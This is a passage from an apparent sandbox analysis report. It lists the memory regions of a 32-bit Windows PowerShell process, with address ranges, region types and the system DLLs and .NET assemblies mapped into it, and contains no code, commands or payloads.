filename = "\\Windows\\SysWOW64\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140_clr0400.dll")
Region:
id = 1602
start_va = 0x73550000
end_va = 0x735fafff
monitored = 0
entry_point = 0x735e5f20
region_type = mapped_file
name = "ucrtbase_clr0400.dll"
filename = "\\Windows\\SysWOW64\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase_clr0400.dll")
Region:
id = 1603
start_va = 0x90000
end_va = 0x90fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000090000"
filename = ""
Region:
id = 1604
start_va = 0x150000
end_va = 0x15ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000150000"
filename = ""
Region:
id = 1605
start_va = 0x1e0000
end_va = 0x1effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 1606
start_va = 0x1f0000
end_va = 0x1fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 1607
start_va = 0x200000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000200000"
filename = ""
Region:
id = 1608
start_va = 0x250000
end_va = 0x25ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 1609
start_va = 0x2d0000
end_va = 0x3cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002d0000"
filename = ""
Region:
id = 1610
start_va = 0x260000
end_va = 0x26ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000260000"
filename = ""
Region:
id = 1611
start_va = 0x270000
end_va = 0x270fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000270000"
filename = ""
Region:
id = 1612
start_va = 0x280000
end_va = 0x280fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000280000"
filename = ""
Region:
id = 1613
start_va = 0xa60000
end_va = 0xc2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 1614
start_va = 0x3d0000
end_va = 0x46ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1615
start_va = 0x470000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000470000"
filename = ""
Region:
id = 1616
start_va = 0x490000
end_va = 0x4cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000490000"
filename = ""
Region:
id = 1617
start_va = 0x8a0000
end_va = 0x8dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008a0000"
filename = ""
Region:
id = 1618
start_va = 0xa20000
end_va = 0xa5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a20000"
filename = ""
Region:
id = 1619
start_va = 0x7efd8000
end_va = 0x7efdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd8000"
filename = ""
Region:
id = 1620
start_va = 0x290000
end_va = 0x29ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000290000"
filename = ""
Region:
id = 1621
start_va = 0x2560000
end_va = 0x455ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002560000"
filename = ""
Region:
id = 1622
start_va = 0x290000
end_va = 0x2affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000290000"
filename = ""
Region:
id = 1623
start_va = 0x980000
end_va = 0x9bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000980000"
filename = ""
Region:
id = 1624
start_va = 0x9d0000
end_va = 0xa0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009d0000"
filename = ""
Region:
id = 1625
start_va = 0x7efd5000
end_va = 0x7efd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efd5000"
filename = ""
Region:
id = 1626
start_va = 0xa90000
end_va = 0xacffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a90000"
filename = ""
Region:
id = 1627
start_va = 0xb60000
end_va = 0xb9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b60000"
filename = ""
Region:
id = 1628
start_va = 0xbf0000
end_va = 0xc2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000bf0000"
filename = ""
Region:
id = 1629
start_va = 0x7efad000
end_va = 0x7efaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efad000"
filename = ""
Region:
id = 1650
start_va = 0xc30000
end_va = 0xefefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1651
start_va = 0x70360000
end_va = 0x7176afff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorlib.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll")
Region:
id = 1652
start_va = 0x2b0000
end_va = 0x2bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002b0000"
filename = ""
Region:
id = 1653
start_va = 0xf00000
end_va = 0x107ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f00000"
filename = ""
Region:
id = 1654
start_va = 0x2c0000
end_va = 0x2cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002c0000"
filename = ""
Region:
id = 1707
start_va = 0x6f900000
end_va = 0x70354fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll")
Region:
id = 1735
start_va = 0x6e0c0000
end_va = 0x6e8d7fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.core.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll")
Region:
id = 1763
start_va = 0x6ad10000
end_va = 0x6ad9efff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "microsoft.powershell.consolehost.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.Pb378ec07#\\731848746c032af3ce33577b793c9b9c\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.pb378ec07#\\731848746c032af3ce33577b793c9b9c\\microsoft.powershell.consolehost.ni.dll")
Region:
id = 1764
start_va = 0x738e0000
end_va = 0x738f6fff
monitored = 0
entry_point = 0x738e3573
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")
Region:
id = 1765
start_va = 0x3d0000
end_va = 0x40bfff
monitored = 0
entry_point = 0x3d128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1766
start_va = 0x430000
end_va = 0x46ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000430000"
filename = ""
Region:
id = 1767
start_va = 0x3d0000
end_va = 0x40bfff
monitored = 0
entry_point = 0x3d128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1768
start_va = 0x3d0000
end_va = 0x40bfff
monitored = 0
entry_point = 0x3d128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1769
start_va = 0x3d0000
end_va = 0x40bfff
monitored = 0
entry_point = 0x3d128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1770
start_va = 0x3d0000
end_va = 0x40bfff
monitored = 0
entry_point = 0x3d128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1771
start_va = 0x738a0000
end_va = 0x738dafff
monitored = 0
entry_point = 0x738a128d
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1799
start_va = 0x6b760000
end_va = 0x6d242fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.management.automation.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Manaa57fc8cc#\\a68aa6199c81feadf8c95a4ea0254b2c\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.manaa57fc8cc#\\a68aa6199c81feadf8c95a4ea0254b2c\\system.management.automation.ni.dll")
Region:
id = 1824
start_va = 0x4d0000
end_va = 0x531fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorrc.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll")
Region:
id = 1825
start_va = 0x900000
end_va = 0x93ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000900000"
filename = ""
Region:
id = 1826
start_va = 0xb20000
end_va = 0xb5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b20000"
filename = ""
Region:
id = 1827
start_va = 0xbb0000
end_va = 0xbeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000bb0000"
filename = ""
Region:
id = 1828
start_va = 0xf10000
end_va = 0xf4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f10000"
filename = ""
Region:
id = 1829
start_va = 0x1040000
end_va = 0x107ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001040000"
filename = ""
Region:
id = 1830
start_va = 0x7efa7000
end_va = 0x7efa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa7000"
filename = ""
Region:
id = 1831
start_va = 0x7efaa000
end_va = 0x7efacfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efaa000"
filename = ""
Region:
id = 1835
start_va = 0x940000
end_va = 0x97ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000940000"
filename = ""
Region:
id = 1836
start_va = 0xad0000
end_va = 0xb0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ad0000"
filename = ""
Region:
id = 1837
start_va = 0x7efa4000
end_va = 0x7efa6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa4000"
filename = ""
Region:
id = 1839
start_va = 0x74960000
end_va = 0x74972fff
monitored = 1
entry_point = 0x7496d900
region_type = mapped_file
name = "nlssorting.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\nlssorting.dll")
Region:
id = 1840
start_va = 0x4560000
end_va = 0x4831fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nlp"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\sortdefault.nlp" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp")
Region:
id = 1850
start_va = 0x4880000
end_va = 0x48bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004880000"
filename = ""
Region:
id = 1851
start_va = 0x4950000
end_va = 0x498ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004950000"
filename = ""
Region:
id = 1852
start_va = 0x7efa1000
end_va = 0x7efa3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa1000"
filename = ""
Region:
id = 1853
start_va = 0x6b050000
end_va = 0x6b75bfff
monitored = 1
entry_point = 0x6b66f392
region_type = mapped_file
name = "system.management.automation.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll")
Region:
id = 1854
start_va = 0x4990000
end_va = 0x509bfff
monitored = 1
entry_point = 0x4faf392
region_type = mapped_file
name = "system.management.automation.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll")
Region:
id = 1855
start_va = 0x6b050000
end_va = 0x6b75bfff
monitored = 1
entry_point = 0x6b66f392
region_type = mapped_file
name = "system.management.automation.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll")
Region:
id = 1856
start_va = 0xf50000
end_va = 0x100ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")
Region:
id = 1857
start_va = 0x6a600000
end_va = 0x6ad0bfff
monitored = 1
entry_point = 0x6ac1f392
region_type = mapped_file
name = "system.management.automation.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll")
Region:
id = 1858
start_va = 0x4990000
end_va = 0x4a4ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")
Region:
id = 1859
start_va = 0x75950000
end_va = 0x75954fff
monitored = 0
entry_point = 0x75951438
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")
Region:
id = 1865
start_va = 0x75be0000
end_va = 0x76829fff
monitored = 0
entry_point = 0x75c61601
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 1866
start_va = 0x3d0000
end_va = 0x3d0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003d0000"
filename = ""
Region:
id = 1868
start_va = 0x76830000
end_va = 0x7685efff
monitored = 0
entry_point = 0x76832a35
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll")
Region:
id = 1870
start_va = 0x74ab0000
end_va = 0x74bd0fff
monitored = 0
entry_point = 0x74ab158e
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")
Region:
id = 1871
start_va = 0x76ed0000
end_va = 0x76edbfff
monitored = 0
entry_point = 0x76ed238e
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")
Region:
id = 1872
start_va = 0xfa0000
end_va = 0xfdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000fa0000"
filename = ""
Region:
id = 1873
start_va = 0x1080000
end_va = 0x10bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001080000"
filename = ""
Region:
id = 1874
start_va = 0x7efa7000
end_va = 0x7efa9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efa7000"
filename = ""
Region:
id = 1876
start_va = 0x3e0000
end_va = 0x3e7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "microsoft.powershell.utility.psm1"
filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1")
Region:
id = 1877
start_va = 0xf60000
end_va = 0xf9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f60000"
filename = ""
Region:
id = 1878
start_va = 0x4ae0000
end_va = 0x4b1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ae0000"
filename = ""
Region:
id = 1879
start_va = 0x7ef9e000
end_va = 0x7efa0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef9e000"
filename = ""
Region:
id = 1880
start_va = 0x74a20000
end_va = 0x74a27fff
monitored = 0
entry_point = 0x74a23bf5
region_type = mapped_file
name = "msisip.dll"
filename = "\\Windows\\SysWOW64\\msisip.dll" (normalized: "c:\\windows\\syswow64\\msisip.dll")
Region:
id = 1881
start_va = 0x4b20000
end_va = 0x4f1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004b20000"
filename = ""
Region:
id = 1882
start_va = 0x3f0000
end_va = 0x3f7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "microsoft.powershell.utility.psm1"
filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1")
Region:
id = 1883
start_va = 0x4b20000
end_va = 0x4f1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004b20000"
filename = ""
Region:
id = 1884
start_va = 0x4a50000
end_va = 0x4a8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004a50000"
filename = ""
Region:
id = 1885
start_va = 0x4b80000
end_va = 0x4bbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004b80000"
filename = ""
Region:
id = 1886
start_va = 0x6f7b0000
end_va = 0x6f7c5fff
monitored = 0
entry_point = 0x6f7b13df
region_type = mapped_file
name = "wshext.dll"
filename = "\\Windows\\SysWOW64\\wshext.dll" (normalized: "c:\\windows\\syswow64\\wshext.dll")
Region:
id = 1887
start_va = 0x7ef9b000
end_va = 0x7ef9dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef9b000"
filename = ""
Region:
id = 1888
start_va = 0x6eba0000
end_va = 0x6ec23fff
monitored = 0
entry_point = 0x6eba19a9
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 1889
start_va = 0x4bc0000
end_va = 0x4d1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004bc0000"
filename = ""
Region:
id = 1890
start_va = 0x74950000
end_va = 0x74959fff
monitored = 0
entry_point = 0x74954ab0
region_type = mapped_file
name = "pwrshsip.dll"
filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\pwrshsip.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\pwrshsip.dll")
Region:
id = 1891
start_va = 0x4bc0000
end_va = 0x4cbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004bc0000"
filename = ""
Region:
id = 1892
start_va = 0x4d10000
end_va = 0x4d1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d10000"
filename = ""
Region:
id = 1937
start_va = 0x3e0000
end_va = 0x3effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 2012
start_va = 0x900000
end_va = 0x93ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000900000"
filename = ""
Region:
id = 2013
start_va = 0x10b0000
end_va = 0x10effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000010b0000"
filename = ""
Region:
id = 2014
start_va = 0x3f0000
end_va = 0x3f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll")
Region:
id = 2037
start_va = 0x400000
end_va = 0x406fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui")
Region:
id = 2046
start_va = 0x3f0000
end_va = 0x3f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll")
Region:
id = 2047
start_va = 0x400000
end_va = 0x406fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui")
Region:
id = 2051
start_va = 0x3f0000
end_va = 0x3f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll")
Region:
id = 2052
start_va = 0x3f0000
end_va = 0x3f6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui")
Region:
id = 2053
start_va = 0x3f0000
end_va = 0x3f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll")
Region:
id = 2054
start_va = 0x3f0000
end_va = 0x3f6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui")
Region:
id = 2055
start_va = 0x3f0000
end_va = 0x3f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll")
Region:
id = 2056
start_va = 0x3f0000
end_va = 0x3f6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui")
Region:
id = 2066
start_va = 0xf20000
end_va = 0xf5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f20000"
filename = ""
Region:
id = 2067
start_va = 0x4d20000
end_va = 0x4d5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004d20000"
filename = ""
Region:
id = 2068
start_va = 0x7ef98000
end_va = 0x7ef9afff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef98000"
filename = ""
Region:
id = 2069
start_va = 0xfc0000
end_va = 0xffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000fc0000"
filename = ""
Region:
id = 2070
start_va = 0x4e30000
end_va = 0x4e6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e30000"
filename = ""
Region:
id = 2071
start_va = 0x7ef95000
end_va = 0x7ef97fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ef95000"
filename = ""
Region:
id = 2144
start_va = 0x6af40000
end_va = 0x6b759fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.data.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Data\\df2dd09ed7c341842a104e1e668f184e\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.data\\df2dd09ed7c341842a104e1e668f184e\\system.data.ni.dll")
Region:
id = 2145
start_va = 0x6a9b0000
end_va = 0x6ad03fff
monitored = 1
entry_point = 0x6ace7a72
region_type = mapped_file
name = "system.data.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll")
Region:
id = 2146
start_va = 0x75960000
end_va = 0x75994fff
monitored = 0
entry_point = 0x7596145d
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")
Region:
id = 2149
start_va = 0x76960000
end_va = 0x76965fff
monitored = 0
entry_point = 0x76961782
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")
Region:
id = 2152
start_va = 0x4e70000
end_va = 0x51c0fff
monitored = 1
entry_point = 0x51a7a72
region_type = mapped_file
name = "system.data.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll")
Region:
id = 2154
start_va = 0x4e70000
end_va = 0x51c0fff
monitored = 1
entry_point = 0x51a7a72
region_type = mapped_file
name = "system.data.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll")
Region:
id = 2155
start_va = 0x4e70000
end_va = 0x51c0fff
monitored = 1
entry_point = 0x51a7a72
region_type = mapped_file
name = "system.data.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll")
Region:
id = 2156
start_va = 0x4e70000
end_va = 0x51c0fff
monitored = 1
entry_point = 0x51a7a72
region_type = mapped_file
name = "system.data.dll"
filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll")
Region:
id = 2157
start_va = 0x3f0000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003f0000"
filename = ""
Region:
id = 2158
start_va = 0x6ec30000
end_va = 0x6f3a3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.xml.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll")
Region:
id = 2162
start_va = 0x6e960000
end_va = 0x6ea8ffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.management.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\e114780fd3ea5727401c06ea4f22ef35\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.management\\e114780fd3ea5727401c06ea4f22ef35\\system.management.ni.dll")
Region:
id = 2163
start_va = 0x6ae10000
end_va = 0x6af3bfff
monitored = 1
entry_point = 0x0
